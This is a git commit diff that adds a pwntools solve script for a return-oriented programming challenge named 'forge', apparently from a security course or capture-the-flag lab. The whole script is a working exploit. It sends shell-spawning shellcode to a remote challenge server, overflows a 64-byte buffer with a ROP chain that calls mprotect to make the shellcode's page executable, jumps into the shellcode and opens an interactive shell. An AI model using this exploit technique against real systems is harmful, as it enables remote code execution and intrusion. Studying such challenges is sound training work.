rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/rop/02_forge/solve.py
+++ b/rop/02_forge/solve.py
@@ -0,0 +1,37 @@
+from pwn import *
+
+context.binary = elf = ELF("./forge", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13574)
+OFF_INPUT = 64
+ret = 0x000000000040101A
+pop_rdi = 0x00000000004011FB
+pop_rsi = 0x0000000000401204
+pop_rdx = 0x000000000040120D
+shellcode_addr = 0x0000000000404080
+MPROTECT_PLT = elf.plt["mprotect"]
+PROT = 0x7
+
+print(p.recvuntil(b"[forge] Send shellcode:\n"))
+shellcode = flat(asm(shellcraft.sh()))
+SHELLCODE_SIZE = 200
+p.send(shellcode)
+# p.send(b"A")
+# p.send(b"\n")
+print(p.recvuntil(b"[forge] Input:\n"))
+payload = flat(
+    b"A" * OFF_INPUT,
+    p64(ret),
+    p64(pop_rdi),
+    p64(shellcode_addr & 0xFFFFF000),  # Must be page aligned
+    p64(pop_rsi),
+    4096,
+    p64(pop_rdx),
+    p64(PROT),
+    # p64(ret),
+    p64(MPROTECT_PLT),
+    p64(shellcode_addr),
+)
+p.send(payload)
+# p.send(b"\n")
+p.interactive()